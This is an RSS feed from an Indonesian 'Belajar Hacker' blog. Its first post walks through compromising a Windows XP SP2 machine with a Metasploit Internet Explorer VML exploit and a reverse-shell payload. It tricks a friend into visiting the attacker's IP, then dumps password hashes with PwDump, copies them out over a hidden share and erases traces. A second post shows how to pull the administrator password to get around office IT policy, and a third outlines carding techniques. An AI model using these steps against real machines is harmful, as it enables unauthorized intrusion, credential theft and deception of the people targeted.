<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/1.5.1-alpha" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
>

<channel>
	<title>AKHMAD SEKHU</title>
	<link>http://akhmadsekhu.blogsome.com</link>
	<description>desaign by akhmadsekhu</description>
	<pubDate>Mon, 18 Jun 2007 13:47:18 +0000</pubDate>
	<generator>http://wordpress.org/?v=1.5.1-alpha</generator>
	<language>en</language>

		<item>
		<title>Hack Windows XP SP2</title>
		<link>http://akhmadsekhu.blogsome.com/2007/06/18/hack-windows-xp-sp2/</link>
		<comments>http://akhmadsekhu.blogsome.com/2007/06/18/hack-windows-xp-sp2/#comments</comments>
		<pubDate>Mon, 18 Jun 2007 13:47:18 +0000</pubDate>
		<dc:creator>sekhu_74</dc:creator>
		
	<category>Belajar Hacker</category>
		<guid>http://akhmadsekhu.blogsome.com/2007/06/18/hack-windows-xp-sp2/</guid>
		<description><![CDATA[<p>Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.
    Setelah mengetahui sedikit dan konsep dasar &lsquo;standar&rsquo; mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja [...]</p>
]]></description>
			<content:encoded><![CDATA[	<p>
<p class="MsoNormal"><strong>Disclaimer:</strong> This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.</p>
	<p class="MsoNormal">Setelah mengetahui sedikit dan konsep dasar &lsquo;standar&rsquo; mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan <a target="_blank" title="Virtual Machine" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fchaidir.wordpress.com%2F2006%2F11%2F14%2Fbelajar-hack-yuck-bagian-3-2%2Fvmware.com&amp;i=0&amp;c=d1e0677c8680aeb7904333863d96d5f0f86ad136">VMWare</a> untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet!  Sistem Operasi yang saya gunakan adalah Windows <span class="caps">XP SP2</span>. </p>
	<p class="MsoNormal"><em>Tools</em> yang saya gunakan adalah <a target="_blank" title="Metasploit Framework" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fchaidir.wordpress.com%2F2006%2F11%2F14%2Fbelajar-hack-yuck-bagian-3-2%2Fmetasploit.com&amp;i=0&amp;c=b33b65bae3cca328c1591d14cf3169a265336154">Metasploit Framework</a> untuk melakukan exploit serta <a target="_blank" title="PwDump6" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fwww.foofus.net%2Ffizzgig%2Fpwdump%2F&amp;i=0&amp;c=4226d687808d6acec641e674eef0c997e06c0404">PwDump6</a> untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?</p>
	<blockquote><p class="MsoNormal"><em>The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research. </em></p></blockquote>
	<p class="MsoNormal">Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca <a target="_blank" title="Metasploit Documentation" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fmetasploit.com%2Fprojects%2FFramework%2Fdocumentation.html&amp;i=0&amp;c=0745211d2d5b1d39cb7fe872f260995e4579cdb9">dokomentasi</a> yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan &lsquo;limited user&rsquo; tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu <a target="_blank" title="Metasploit 3" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fmetasploit.com%2Fprojects%2FFramework%2Fmsf3%2F&amp;i=0&amp;c=f55cc749267e34f4c97b76206aedace40f72bf3d">versi 3 Beta 3</a>, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya. </p>
	<p class="MsoNormal">Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan <a target="_blank" title="Cygwin" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fwww.cygwin.com%2F&amp;i=0&amp;c=be5cfdc14f4877866450cd7528f583b96e09863f">cygwin</a> untuk menjalankannya, karena metasploit dibuat menggunakan <a target="_blank" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fwww.cpan.org%2F&amp;i=0&amp;c=f4a8ccc105f5cde03bc535870bcfa7cbffb8dbd2">Perl</a>.  Sekarang mari kita praktekkan!!</p>
	<p class="MsoNormal">Pertama2 jalankan &lsquo;mfsconsole&rsquo;! </p>
	<p class="MsoNormal"> <a title="main1.JPG" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fchaidir.files.wordpress.com%2F2006%2F11%2Fmain1.JPG&amp;i=0&amp;c=60771f650b982bb8ad13476978a17c1bde6ee2bf"><img border="0" alt="main1.JPG" src="http://chaidir.files.wordpress.com/2006/11/main1.JPG" /></a></p>
	<p class="MsoNormal"> Untuk mempelajari command apa saja yang ada di <span class="caps">MSF</span>Console gunakan perintah &lsquo;help&rsquo;.</p>
	<p class="MsoNormal">Karena komputer yang ingin dijadikan target adalah Windows <span class="caps">XP SP2</span>, maka digunakan exploit yang berpengaruh terhadap <span class="caps">XP SP2</span> yaitu dengan memanfaatkan kelemahan pada <a target="_blank" title="MS06-055" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fwww.microsoft.com%2Ftechnet%2Fsecurity%2Fbulletin%2FMS06-055.mspx&amp;i=0&amp;c=7ef270c5977e05be2d15d52a96a96d9955a6000a"><em>Internet Explorer <span class="caps">VML </span>Fill Method Code Execution</em></a>. </p>
	<blockquote><p class="MsoNormal"><em>This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the <span class="caps">VML</span> processing code (VGX.dll). This module has been tested on Windows 2000 <span class="caps">SP4</span>, Windows <span class="caps">XP SP0</span>, and Windows <span class="caps">XP SP2</span>.</em></p></blockquote>
	<p class="MsoNormal"> Untuk melihat info dari exploit ini gunakan perintah : </p>
	<blockquote><p class="MsoNormal">msf  > info ie_vml_rectfill</p></blockquote>
	<p class="MsoNormal"><em></em>Exploit <em>ie_vml_rectfill</em> memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit<em> &lsquo;social engineering&rsquo;</em>, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat <span class="caps">IP </span>(atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit &lsquo;bekerja&rsquo;.  Setelah beberapa saat bilang aja &ldquo;wah.. ada error nih. Ok deh.. saya coba betulin dulu&hellip; makasih ya&rdquo;. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-&rsquo;end process&rsquo;-kan &lsquo;dumpred.exe&rsquo; juga, tapi setelah exploit bekerja <img border="0" class="wp-smiley<a href="-D"> alt=</a>&#8221; src=&#8221;http://chaidir.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif&#8221; /> ). </p>
	<p class="MsoNormal">
 Untuk menggunakan exploit gunakan perintah2 berikut dalam console :</p>
	<blockquote><p class="MsoNormal">msf > use_ie_vml_rectfill</p>
	<p class="MsoNormal">msf > set <span class="caps">PAYLOAD</span> win32_reverse</p>
	<p class="MsoNormal">msf > set <span class="caps">RHOST</span> ip_target</p>
	<p class="MsoNormal">msf > set <span class="caps">LHOST</span> ip_penyerang</p>
	<p class="MsoNormal">msf > exploit</p></blockquote>
	<p class="MsoNormal">  Hasilnya akan tampak seperti gambar berikut :</p>
	<p class="MsoNormal"> <a title="exploit1.JPG" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fchaidir.files.wordpress.com%2F2006%2F11%2Fexploit1.JPG&amp;i=0&amp;c=4fb605438bac942d6cec5368cd789c1d983e1478"><img border="0" alt="exploit1.JPG" src="http://chaidir.files.wordpress.com/2006/11/exploit1.JPG" /></a></p>
	<p class="MsoNormal"><em> </em><!--[if gte vml 1]&gt;   --><<img src="--[if" alt="" border="0" />vml]&#8212;><!--[endif]--></p>
	<p class="MsoNormal">
	<p class="MsoNormal">Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu &lsquo;payload&rsquo; yang digunakan adalah &lsquo;win32_reverse&rsquo; dan <span class="caps">HTTP PORT</span> nya adalah 80 (default http port). Setalah menjalankan perintah &lsquo;exploit&rsquo;, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus <img border="0" class="wp-smiley<a href="-D"> alt=</a>&#8221; src=&#8221;http://chaidir.wordpress.com/wp-includes/images/smilies/icon_biggrin.gif&#8221; /> </p>
	<p class="MsoNormal">Jika anda berhasil, maka anda akan mendapatkan &lsquo;cmd.exe&rsquo; dari komputer target. </p>
	<p class="MsoNormal">&nbsp;</p>
	<p class="MsoNormal">
	<p class="MsoNormal"><strong>Crack da Password!</strong></p>
	<p class="MsoNormal">Nah, setelah kita &lsquo;menguasai&rsquo; komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang <a target="_blank" title="Hack Windows XP SP2 Password" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fchaidir.wordpress.com%2F2006%2F09%2F24%2Fhack-windows-xp-sp2-passwords%2F&amp;i=0&amp;c=7868efa24d3a81187d958ba21719f95ec5aa1144">Hack Win <span class="caps">XP SP2 </span>Password</a>, tapi karena ini remote maka kita harus &lsquo;menyediakan&rsquo; program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user &lsquo;biasa&rsquo;, pwdump tidak akan berhasil! </p>
	<p class="MsoNormal">Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran &lsquo;$&rsquo; biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan &lsquo;net use&rsquo;. Contoh perintah yang digunakan :</p>
	<p class="MsoNormal">
	<p class="MsoNormal"><a title="pwdump.JPG" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fchaidir.files.wordpress.com%2F2006%2F11%2Fpwdump.JPG&amp;i=0&amp;c=c837e22dd97c5ff844e3ec5128ff2bcdb7373c63"><img border="0" alt="pwdump.JPG" src="http://chaidir.files.wordpress.com/2006/11/pwdump.JPG" /></a></p>
	<p class="MsoNormal">
	<p class="MsoNormal">Setelah itu copy Pwdump ke komputer target dalam folder sementara, &lsquo;temp&rsquo;. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah </p>
	<p class="MsoNormal">
	<blockquote><p class="MsoNormal">C:tempPwdump &ndash;o pass.txt 127.0.0.1</p></blockquote>
	<p class="MsoNormal">
	<p class="MsoNormal">Klo berhasil akan tampak pada gambar berikut. </p>
	<p class="MsoNormal">&nbsp;<a title="dump1.JPG" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fchaidir.files.wordpress.com%2F2006%2F11%2Fdump1.JPG&amp;i=0&amp;c=bc3a06630c6afb0b4473339399856a0922047f23"><img border="0" alt="dump1.JPG" src="http://chaidir.files.wordpress.com/2006/11/dump1.JPG" /></a></p>
	<p class="MsoNormal">&nbsp;Lalu copy file pass.txt ke komputer kita </p>
	<p class="MsoNormal">
	<blockquote><p class="MsoNormal">C:tempcopy pass.txt z:</p></blockquote>
	<p class="MsoNormal">
	<p class="MsoNormal">
	<p class="MsoNormal">Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu. </p>
	<p class="MsoNormal"><a title="clean.JPG" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fchaidir.files.wordpress.com%2F2006%2F11%2Fclean.JPG&amp;i=0&amp;c=0e4b44f8b26cfcfaedc1896bac2b4119b3174cb5"><img border="0" alt="clean.JPG" src="http://chaidir.files.wordpress.com/2006/11/clean.JPG" /></a></p>
	<p class="MsoNormal">
	<p class="MsoNormal">Nah, udah dapet hash file nya kan. Tinggal di crack aja deh&hellip;. (baca artikel sebelumnya buat nge-<a target="_blank" href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fchaidir.wordpress.com%2F2006%2F09%2F24%2Fhack-windows-xp-sp2-passwords%2F&amp;i=0&amp;c=7868efa24d3a81187d958ba21719f95ec5aa1144">crack password</a>).</p>
	<p class="MsoNormal">
	<p class="MsoNormal">Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat &lsquo;menyenangkan&rsquo; untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.</p>
	<p class="MsoNormal">
	<p class="MsoNormal">
	<p class="MsoNormal">Happy Hacking&hellip;..</p>
	<p class="MsoNormal">&nbsp;</p>
	<p class="MsoNormal">Beberapa saran agar windows kita tetap aman terhadap exploit diatas.</p>
	<p class="MsoNormal">1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.</p>
	<p class="MsoNormal">2. Patch Windows anda.</p>
	<p class="MsoNormal">3. Gunakan antivirus dengan update terbaru</p>
	<p class="MsoNormal">4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p</p>
	<p class="MsoNormal">&nbsp;</p>
	<p class="MsoNormal">&nbsp;</p>
	<p class="MsoNormal">Reference :</p>
	<p class="MsoNormal">http://www.metasploit.com</p></p>
]]></content:encoded>
			<wfw:commentRss>http://akhmadsekhu.blogsome.com/2007/06/18/hack-windows-xp-sp2/feed/</wfw:commentRss>
	</item>
		<item>
		<title>Hack n Crack World</title>
		<link>http://akhmadsekhu.blogsome.com/2007/06/18/hack-n-crack-world/</link>
		<comments>http://akhmadsekhu.blogsome.com/2007/06/18/hack-n-crack-world/#comments</comments>
		<pubDate>Mon, 18 Jun 2007 13:45:42 +0000</pubDate>
		<dc:creator>sekhu_74</dc:creator>
		
	<category>Belajar Hacker</category>
		<guid>http://akhmadsekhu.blogsome.com/2007/06/18/hack-n-crack-world/</guid>
		<description><![CDATA[<p>Memang hidup dijaman sekarang yang sulit semakin sulit bila setiap keinginan kita untuk &ldquo;berkembang&rdquo; dikekang. Bagi karyawan perkantoran yang menggunakan komputer dengan OS Windows XP akan makin terkekang kebebasannya karena komputer hanya bisa digunakan hanya untuk kerja dan kerja.
    Memang ini merupakan IT policy setiap kantor yang tidak memperbolehkan untuk menginstall bermacam2 program tapi hal inilah [...]</p>
]]></description>
			<content:encoded><![CDATA[	<p>
<div class="snap_preview">
<p>Memang hidup dijaman sekarang yang sulit semakin sulit bila setiap keinginan kita untuk &ldquo;berkembang&rdquo; dikekang. Bagi karyawan perkantoran yang menggunakan komputer dengan <span class="caps">OS </span>Windows XP akan makin terkekang kebebasannya karena komputer hanya bisa digunakan hanya untuk kerja dan kerja.</p>
	<p>Memang ini merupakan IT policy setiap kantor yang tidak memperbolehkan untuk menginstall bermacam2 program tapi hal inilah yang membuat para karyawan sulit untuk berkembang. Memang harus diakui ada sisi baik dan ada juga sisi buruk dari penerapan <span class="caps">IT </span>Policy.</p>
	<p>Tapi kali ini kita sedikit mengabaikan sisi baik dari IT policy tersebut dan lebih mensupport para karyawan untuk bisa berkembang.</p>
	<p>Artikel ini sedikit memberi gambaran bahwa setiap ada kesulitan pasti ada jalan keluar.</p>
	<p>Di dunia maya ini banyak sekali artikel yang membahas tentang&nbsp; cara membongkar password administrator Windows XP bahkan sudah banyak program yang dibuat untuk mereset ataupun mengganti password tersebut. Tentunya jika kita ingin bermain manis, kita tidak perlu melakukan cara-cara kasar tersebut karena resiko yang kita ambil akan lebih besar. Cara yang digunakan untuk menemukan password administartor sangat simple dan tidak perlu banyak pengetahuan yang dibutuhkan hanya tinggal mengikuti langkah dibawah ini :</p>
	<p>Keperluan yang dibutuhkan untuk mengetahui password administrator antara lain 1 buah disket, akses internet dan email:<br />
 langkah pertama adalah mendownload file image.exe dari http://www.loginrecovery.com/referal.php?p=2<br />
 Buat bootable disk dengan menjalankan file tersebut<br />
 Matikan computer lalu boot dengan menggunakan disk tersebut. (disk tersebut akan menghasilkan satu buah file upload.txt)<br />
 Setelah itu masuk ke windows xp secara normal (sebelumnya keluarkan disket) lalu buka http://www.loginrecovery.com/instructions.php<br />
 Masukkan disket lalu pilih upload.txt, masukkan alamat email dan access code lalu klik submit.<br />
 Kita akan mendapatkan konfirmasi lewat email untuk mengetahui password kita telah selesai. Sebenarnya website ini sangat cepat sekali untuk menemukan password tetapi karena kita menggunakannya secara gratisan maka harus menunggu 48 jam (2 hari) untuk bisa melihat password administrator, kecuali kalau mau bayar, dimenit itu juga password bisa ketahuan.<br />
 Bila telah 48 jam (lama bener yah ..) buka http://www.loginrecovery.com/results.php , masukkan alamat email saat kita mengupload, klik view lalu masukkan access code and .. password administrator ditemukan</p>
	<p>Memang segala sesuatu tidak ada yang sempurna tetapis situs ini mengklaim keberhasilan menemukan password diatas 98.5% hebat bukan &hellip;</p>
	<p><img width="405" height="391" border="0" align="bottom" src="http://jasakom.com/Images3/PassXP1.JPG" /></p>
	<p><img width="424" height="391" border="0" align="bottom" src="http://jasakom.com/Images3/PassXP2.JPG" /></p>
	<p><img width="421" height="404" border="0" align="middle" src="http://jasakom.com/Images3/PassXP3.JPG" /></p>
	<p>Selamat mencoba dan ingat segala sesuatu yang kita perbuat, akibatnya kita sendiri yang mananggungnya jadi waspadalah&hellip;..</p>
 </div></p>
]]></content:encoded>
			<wfw:commentRss>http://akhmadsekhu.blogsome.com/2007/06/18/hack-n-crack-world/feed/</wfw:commentRss>
	</item>
		<item>
		<title>Cara Hacker curi data Kartu Kredit</title>
		<link>http://akhmadsekhu.blogsome.com/2007/06/18/cara-hacker-curi-data-kartu-kredit/</link>
		<comments>http://akhmadsekhu.blogsome.com/2007/06/18/cara-hacker-curi-data-kartu-kredit/#comments</comments>
		<pubDate>Mon, 18 Jun 2007 13:38:01 +0000</pubDate>
		<dc:creator>sekhu_74</dc:creator>
		
	<category>Belajar Hacker</category>
		<guid>http://akhmadsekhu.blogsome.com/2007/06/18/cara-hacker-curi-data-kartu-kredit/</guid>
		<description><![CDATA[<p>Artikel ini tidak ditujukan untuk mengajari anda gimana mencuri data kartu kredit, tapi kami ingin memberitahu anda supaya di kemudian hari anda bisa terhindari dari kejahatan pencurian data kartu kredit. Istilah kejahatan kartu kredit yang biasa di istilahkan &ldquo;carding&rdquo; sejak adanya internet meningkat ratusan persen. Ironisnya Indonesia masuk dalam jajaran top 10 (sempat di peringkat [...]</p>
]]></description>
			<content:encoded><![CDATA[	<p>
<p>Artikel ini tidak ditujukan untuk mengajari anda gimana mencuri data kartu kredit, tapi kami ingin memberitahu anda supaya di kemudian hari anda bisa terhindari dari kejahatan pencurian data kartu kredit. Istilah kejahatan kartu kredit yang biasa di istilahkan &ldquo;carding&rdquo; sejak adanya internet meningkat ratusan persen. Ironisnya Indonesia masuk dalam jajaran top 10 (sempat di peringkat pertama) sehingga kartu kredit terbitan Bank-Bank Indonesia ditolak ketika belanja online di situs luar negeri. Hal ini juga pernah di alami oleh penulis yang ingin berlangganan majalah game luar negeri dengan pembayaran online lewat kartu kredit.  Para hacker sangat suka sekali kejahatan yang satu ini, kenapa? Karena kalau cuma nge-hack website atau deface (merubah tampilan/link website) merupakan sesuatu yang tidak ada untungnya. Dan hal ini bisa ke deteksi dan pelaku kejahatan bisa ketangkap dengan mudah kalau sites yang dia masuki memiliki <span class="caps">TRACKER </span>(program pelacak ip/link) atau <span class="caps">LOG FILE </span>(file yang mencatat aktivitas user/ip yang masuk ke website). Kalau carding mereka bisa bebas tanpa jejak dan juga kadang-kadang setelah mendapatkan datanya, mereka sebarkan antar hacker sehingga susah dilacak orang pertama yang mencuri data kartu kredit. Kejadian baru-baru ini yaitu situs internet teroris Indonesia juga di register dari hasil carding.  Ada beberapa cara yang digunakan oleh hacker dalam mencuri kartu kredit, antara lain: 1. Paket sniffer, cara ini adalah cara yang paling cepat untuk mendapatkan data apa saja. Konsep kerjanya mereka cukup memakai program yang dapat melihat atau membuat logging file dari data yang dikirim oleh website e-commerce (penjualan online) yang mereka incar. Pada umumnya mereka mengincar website yang tidak dilengkapi security encryption atau situs yang tidak memiliki security yang bagus.  2. Membuat program spyware, trojan, worm dan sejenisnya yang berfungsi seperti keylogger (keyboard logger, program mencatat aktifitas keyboard) dan program ini disebar lewat E-mail Spamming (taruh file-nya di attachment), mirc (chatting), messenger (yahoo, <span class="caps">MSN</span>), atau situs-situs tertentu dengan icon atau iming-iming yang menarik netter untuk mendownload dan membuka file tersebut. Program ini akan mencatat semua aktivitas komputer anda ke dalam sebuah file, dan akan mengirimnya ke email hacker. Kadang-kadang program ini dapat dijalankan langsung kalau anda masuk ke situs yang di buat hacker atau situs porno.  3. Membuat situs phising, yaitu situs sejenis atau kelihatan sama seperti situs aslinya. contoh di Indonesia ketika itu situs klik bca (www.klikbca.com), pernah mengalami hal yang sama. situs tersebut tampilannya sama seperti klikbca tetapi alamatnya dibikin beberapa yang berbeda seperti www.clikbca.com, www.kikbca.com, dll, jadi kalau netter yang salah ketik, akan nyasar ke situs tersebut. Untungnya orang yang membuat situs tersebut katanya tidak bermaksud jahat. Nah kalau hacker carding yang buat tuh situs, siap-siap deh kartu kredit anda bakal jebol.  4. Menjebol situs e-commerce itu langsung dan mencuri semua data para pelanggannya. Cara ini agak sulit dan perlu pakar hacker atau hacker yang sudah pengalaman untuk melakukannya. Pada umumnya mereka memakai metode injection (memasukan script yang dapat dijalankan oleh situs/server) bagi situs yang memiliki firewall. Ada beberapa cara injection antara lain yang umum digunakan html injection dan <span class="caps">SQL</span> injection. Bagi situs yang tidak memiliki security atau firewall, siap-siaplah dikerjain abis-abisan.  Ada beberapa cara lagi yang dilakukan para hacker, tapi cara-cara di atas adalah cara yang paling umum dilakukan hacker untuk carding. Cara yang tidak umum akan dijelaskan nanti di lain waktu. Kejahatan tidak hanya terjadi karena ada niat dari si pelaku, tetapi karena adanya kesempatan, waspadalah&hellip; waspadalah&hellip; </p></p>
]]></content:encoded>
			<wfw:commentRss>http://akhmadsekhu.blogsome.com/2007/06/18/cara-hacker-curi-data-kartu-kredit/feed/</wfw:commentRss>
	</item>
		<item>
		<title>Hello world!</title>
		<link>http://akhmadsekhu.blogsome.com/2007/06/18/hello-world/</link>
		<comments>http://akhmadsekhu.blogsome.com/2007/06/18/hello-world/#comments</comments>
		<pubDate>Mon, 18 Jun 2007 13:21:47 +0000</pubDate>
		<dc:creator>sekhu_74</dc:creator>
		
	<category>Belajar Hacker</category>
		<guid>http://akhmadsekhu.blogsome.com/2007/06/18/hello-world/</guid>
		<description><![CDATA[<p>Welcome to your new blog. This is your first post. Edit or delete it, then start blogging!
    An email has been sent to you giving you details of how to log in to the administration section. From there you can change the design by clicking on the tab MANAGE and then click on the tab THEMES. [...]</p>
]]></description>
			<content:encoded><![CDATA[	<p>
<p>Welcome to your new blog. This is your first post. Edit or delete it, then start blogging!</p>
	<p>An email has been sent to you giving you details of how to log in to the administration section. From there you can change the design by clicking on the tab <span class="caps">MANAGE</span> and then click on the tab <span class="caps">THEMES</span>. If you have any questions, ask them in the <a href="http://akhmadsekhu.blogsome.com/go.php?u=http%3A%2F%2Fblogsome-forum.blogsome.com&amp;i=0&amp;c=95f1ea4bde6635dd7746b02598b574070a292f6c">forums</a>&#8212;we are only too willing to help.</p></p>
]]></content:encoded>
			<wfw:commentRss>http://akhmadsekhu.blogsome.com/2007/06/18/hello-world/feed/</wfw:commentRss>
	</item>
	</channel>
</rss>
